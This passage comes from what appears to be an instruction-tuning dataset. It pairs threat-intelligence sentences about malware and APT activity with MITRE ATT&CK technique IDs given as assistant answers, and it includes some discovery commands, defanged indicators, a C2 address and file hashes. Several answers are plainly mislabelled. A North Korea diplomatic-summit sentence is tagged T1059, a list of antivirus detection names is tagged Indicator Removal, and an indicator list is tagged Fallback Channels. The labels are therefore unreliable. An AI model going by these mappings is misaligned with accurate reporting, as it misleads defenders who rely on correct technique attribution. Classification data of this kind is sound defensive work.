framework.,BRONZE BUTLER has used net user /domain to identify account information.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot contains keylogging functionality to steal passwords.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 gathered a list of running processes on the system using tasklist /v.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has split archived exfiltration files into chunks smaller than 1MB.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 used SQL scripts to help perform tasks on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used WinRAR and 7-Zip to compress an archive stolen data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used batch script files to automate execution and deployment of payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The summit is the latest in a line of signs of diplomatic outreach from North Korea, following the Panmunjom Declaration for Peace, Prosperity and Unification of the Korean Peninsula between South Korea and North Korea on April 27, 2018### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used a series of compromised websites that victims connected to randomly to relay information to command and control .### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa collected the system volume serial number, GUID, and computer name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEARDROP modified the Registry to create a Windows service for itself on a compromised host.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can lower security settings by changing Registry keys.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Character Digit h 0 i 1 j 2 k 3 l 4 m 5 n 6 o 7 p 8 q 9 Table 4 Character substitution used in RogueRobin The Trojan will use future DNS requests to retrieve jobs from the C2 server, which the Trojan will handle as commands### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is the only instance we observed where a hardcoded Google Drive URL was included in RogueRobin, which may suggest that the author may have overlooked this during testing### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used a valid certificate to sign their primary loader Silence.Downloader .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has a command to delete a Registry key it uses, \Software\Microsoft\Internet Explorer\notes.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This activity may also be seen shortly after Internal Spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A variety of methods exist for compromising social media accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials .### Assistant: T1586: Compromise Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Variants of Anchor can use DNS tunneling to communicate with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has used HTTP GET and POST requests for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,All strings used by the Trojan are encrypted with the XOR algorithm### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT used voStro.exe, a compiled pypykatz , to steal credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Search order hijacking is also a common practice for hijacking DLL loads and is covered in DLL Search Order Hijacking.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can capture clipboard data.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When the shellcode embedded within the malicious EPS is executed, the following three files are dropped: %PROGRAMDATA%\Microsoft\DeviceSync\VMwareCplLauncher.exe %PROGRAMDATA%\Microsoft\DeviceSync\vmtools.dll %PROGRAMDATA%\Microsoft\DeviceSync\MSBuild.exe In the list of dropped files, VMwareCplLauncher.exe is a legitimate, signed VMware executable that serves to ultimately deliver the BADNEWS payload### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can obtain information about the local system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADCALL functions as a proxy server between the victim and C2 server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use a file exfiltration tool to collect recently changed files on a compromised host.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to identify connected Apple devices.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer has copied itself to the :bin alternate data stream of a newly created file.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an alternate data stream named kernel32.dll that is saved in %PROGRAMDATA%\Windows\.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can use a module to perform keylogging on compromised hosts.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These tokens are typically stolen from users and used in lieu of login credentials.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Net Crawler uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used Python-based implants to interact with compromised hosts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok is packed with an UPX executable packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows systems use a common method to look for required DLLs to load into a program.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Batch files also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Perhaps they plan to pair this stealer with another dropper that maintains the WMI anti-AV functionality### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has remotely copied tools and malware onto targeted systems.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat is capable of providing shell functionality to the attacker to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed dropping browser password grabber modules.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CopyKittens has used PowerShell Empire.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy stores itself in ~/Library/.DS_Stores/ Calisto uses a hidden directory named .calisto to store data from the victim’s machine before exfiltration.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT uses WMI to check the BIOS and manufacturer information for strings like ""VMWare"", ""Virtual"", and ""XEN"" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VBShower used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\a-f0-9A-F{8} to maintain persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has collected a list of installed software on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To establish persistence, Truvasys adds a Registry Run key with a value ""TaskMgr"" in an attempt to masquerade as the legitimate Windows Task Manager.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The subdomain 676f6f646c75636b is a hex encoded string which decodes to goodluck### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has distributed Windows malware via drive-by downloads.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Web applications and services often use session cookies to authenticate and authorize user access.### Assistant: T1606: Forge Web Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used UPX to obscure malicious code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy captures keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Patchwork .dll that contains BADNEWS is loaded and executed using DLL side-loading.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CoinTicker downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It has also accessed network diagram files useful for understanding how a host's network was configured.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer can extract malware from a downloaded JPEG.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has deployed privileged containers that mount the filesystem of victim machine.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to do real time screen viewing on an infected host.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Poseidon Group's Information Gathering Tool includes PowerShell components.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST checked the domain name of the compromised host to verify it was running in a real environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The shareDll32 module then enumerates and identifies systems connected on the same domain using WNetEnumResource and GetComputerNameW### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaRicto has obtained open source tools to use in their operations.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used VBS for code execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba loaded the payload into memory using PowerShell.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit has used rundll32 to launch a malicious DLL as C:Windowsinfpub.dat.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER can download or upload files from its C2 server.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon sent spearphishing emails containing links to compromised websites where malware was downloaded.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN4 has used Tor to log in to victims' email accounts.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can collect system information including the OS version and domain on a compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has a command to delete a file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may include custom or publicly available encoding/compression algorithms as well as embedding data within protocol headers and fields.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RobbinHood stops 181 Windows services on the system before beginning the encryption process.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caterpillar WebShell can obtain a list of the services from a system.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 enumerated administrative users using the commands net localgroup administrators.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYSCON has the ability to use FTP in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.### Assistant: T1613: Container and Resource Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa has used VBScript code on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy's setup file installs initial executables under the folder %WinDir%\System32\PluginManager.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TEARDROP checked that HKU\SOFTWARE\Microsoft\CTF existed before decoding its embedded payload.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mosquito can upload and download files to the victim.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The COR_PROFILER can also be used to elevate privileges if the victim .NET process executes at a higher permission level, as well as to hook and Impair Defenses provided by .NET processes.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CookieMiner has used Google Chrome's decryption and extraction operations.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser to ensure it is vulnerable prior to attempting exploitation.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kaspersky Lab products detect the malware used by Poseidon Group with the following detection names: Backdoor.Win32.Nhopro HEUR:Backdoor.Win32.Nhopro.gen HEUR:Hacktool.Win32.Nhopro.gen How many victims have you found? At least 35 victim companies have been identified with primary targets including financial and government institutions, telecommunications, manufacturing, energy and other service utility companies, as well as media and public relations firms### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar captures images from the webcam.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D uses Word macros for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has used a .NET tool named dog.exe to exiltrate information over an e-mail account.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The dropped files are either in the root of the “ProgramData” folder or in a subdirectory### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has injected code into a selected process, which in turn launches a command as a child process of the original.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 also creates a Windows service to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used malware to enumerate active processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Example services include websites, email services, DNS, and web-based applications.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp's passw.plug plugin can gather account information from multiple instant messaging, email, and social media services, as well as FTP, VNC, and VPN clients.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can decode its payload prior to execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can harvest data from mail clients.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may disable or delete system recovery features to augment the effects of Data Destruction and Data Encrypted for Impact.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Night Dragon has performed SQL injection attacks of extranet web servers to gain access.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.### Assistant: T1039: Data from Network Shared Drive" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or SSH.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the second method for changing the operating system in memory, the adversary would make use of the boot loader.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Get-NetDomainTrust ### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used RDP for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch searches for files with specific file extensions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST used Base64 encoding in its C2 traffic.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can launch a remote shell to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mustang Panda has used tasklist /v to determine active process information.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST also obfuscated collected system information using a FNV-1a + XOR algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also uses a custom XOR algorithm to obfuscate code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Doki has resolved the path of a process PID to use as a script argument.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT can request to delete files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has also used torrent file-sharing sites to more indiscriminately disseminate malware to victims.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The executable contains a side-loading weakness which is used to load a portion of the malware.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has deleted files associated with their payload after execution.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the event it does, Reaver will move this file to ‘%TEMP%\~FJIOW.tmp’ and delete this new file### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On September 24, 2018, we observed an organization targeted by OilRig attempting to download a Zip archive from the following URL: hxxp://193.111.152[.]13/[redacted]-ITsoftwareUpdate.zip This Zip archive contained a file named [redacted]-ITsoftwareUpdate.exe (SHA256: 5f42deb792d8d6f347c58ddbf634a673b3e870ed9977fdd88760e38088cd7336), which is a variant of the OopsIE Trojan we described in detail in a blog we published in September 2018### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remexi encrypts and adds all gathered browser data into files for upload to C2.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can obtain a list of running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Get-MicrophoneAudio### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indicators of Compromise (IoCs) C&C servers Ssl[.]arkouthrie[.]com s3[.]hiahornber[.]com widget[.]shoreoa[.]com SHA256 Delivery document (W2KM_OCEANLOTUS.A): 2bb855dc5d845eb5f2466d7186f150c172da737bfd9c7f6bc1804e0b8d20f22a Dropper (OSX_OCEANLOTUS.D): 4da8365241c6b028a13b82d852c4f0155eb3d902782c6a538ac007a44a7d61b4 Backdoor (OSX_OCEANLOTUS.D): 673ee7a57ba3c5a2384aeb17a66058e59f0a4d0cddc4f01fe32f369f6a845c8f The post New MacOS Backdoor Linked to OceanLotus Found appeared first on### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WinMM uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used the quser command to show currently logged on users.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can access the victim’s webcam to take pictures.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Analysis APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WindTail has used icons mimicking MS Office files to mask payloads.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Upon exiting, /etc/zlogout and ~/.zlogout are executed.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Before registering new passwords in the Security Accounts Manager , the Local Security Authority requests validation from each registered filter.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Windows and Linux, these system processes are referred to as services.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This use of guardrails is distinct from typical Virtualization/Sandbox Evasion.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can use run keys and create link files in the startup folder for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's macOS backdoor hides the clientID file via a chflags function.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KillDisk also targets and deletes files with 35 different file extensions.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the ROM Monitor by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNSPOT monitored running processes for instances of MsBuild.exe by hashing the name of each running process and comparing it to the corresponding value 0x53D525.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has a function to hijack data from the clipboard by monitoring the contents of the clipboard and replacing the cryptocurrency wallet with the attacker's.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's macOS backdoor can receive a “delete” command.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Volgmer uses a simple XOR cipher to encrypt traffic and files.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RGDoor uses HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remsec can obtain a list of users.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest uses the CGEventTap functions to perform keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the quarantine flag is set in macOS 10.15+, Gatekeeper also checks for a notarization ticket and sends a cryptographic hash to Apple's servers to check for validity for all unsigned executables.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the 